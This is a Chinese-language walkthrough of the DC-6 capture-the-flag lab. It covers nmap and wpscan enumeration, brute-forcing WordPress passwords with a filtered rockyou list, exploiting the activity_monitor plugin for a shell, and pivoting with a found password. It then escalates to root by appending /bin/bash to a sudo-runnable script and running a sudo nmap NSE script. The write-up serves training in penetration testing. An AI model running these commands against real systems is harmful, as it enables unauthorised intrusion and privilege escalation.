一、实验环境
攻击机(kali):192.168.189.148
靶机(ubuntu):192.168.189.186
二、信息收集
1、使用nmap探测存活主机
nmap -sP 192.168.189.0/24
2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描
nmap -sV -A -T4 -p- 192.168.189.186
3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件
4、修改完成后即可正常访问
5、通过页面我们可以发现该站点使用了wordpress,并且通过首页的提示可能与wordpress插件有关
6、扫描目录发现后台地址
dirb http://wordy
7、通过wpscan对网站进行扫描
wpscan --url http://wordy/ -e u
除了发现了几个用户名之外并没有任何有价值的东西
8、通过靶场的提示我们可以得到一个密码字典
官网提示使用rockyou.txt:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt。
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6passwd.txt
三、漏洞利用
1、解压完成之后再次使用wpscan扫描网站,这次带上我们的密码字典
wpscan --url http://wordy/ -e u -P dc6passwd.txt
通过wpscan爆破得到了密码helpdesk01
2、登录网站后我们发现了activity_monitor插件
3、搜索activity_monitor插件的相关漏洞
searchsploit activity monitor
4、直接利用py脚本拿shell
利用py脚本拿到shell之后发现执行其他命令时很容易断开连接,我们直接反弹一个shell到kali
5、利用python起一个会话窗口
python -c "import pty;pty.spawn('/bin/bash')"
6、我们在/home/mark/stuff目录下发现thing-to-do.txt文件
7、我们从上面的文件得到graham用户的密码,切换到该用户,并查看其sudo权限
www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
graham@dc-6:/home/mark/stuff$ sudo -l
8、发现一个backups.sh文件,其内容为压缩备份web文件。
cat backups.sh
9、我们写入:echo "/bin/bash" >> backups.sh,运行后它会打开一个shell(此处会打开jens用户的shell)。
使用jens的身份执行该脚本:
sudo -u jens /home/jens/backups.sh
四、权限提升
1、查看jens的sudo权限,发现有nmap
sudo -l
2、使用nmap进行提权
echo 'os.execute("/bin/sh")' >getshell.nse
sudo nmap --script=getshell.nse
3、成功拿到root权限
4、成功获取到flag